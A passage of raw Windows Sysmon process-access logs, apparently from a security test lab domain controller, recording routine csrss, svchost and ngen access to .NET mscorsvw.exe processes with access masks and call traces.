SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7336,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.570\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-0010BCB90C00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.570","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-0010BCB90C00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7337,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00104D1D0D00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00104D1D0D00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7338,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.632\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224B-5F25-0000-00105BBD0C00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.632","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224B-5F25-0000-00105BBD0C00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7339,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.632\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224B-5F25-0000-00105BBD0C00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.632","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224B-5F25-0000-00105BBD0C00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7340,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.648\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00108E210D00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.648","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00108E210D00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7341,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.679\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010525C0C00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.679","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010525C0C00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7342,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.679\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010525C0C00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.679","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010525C0C00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7343,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-001030250D00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-001030250D00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
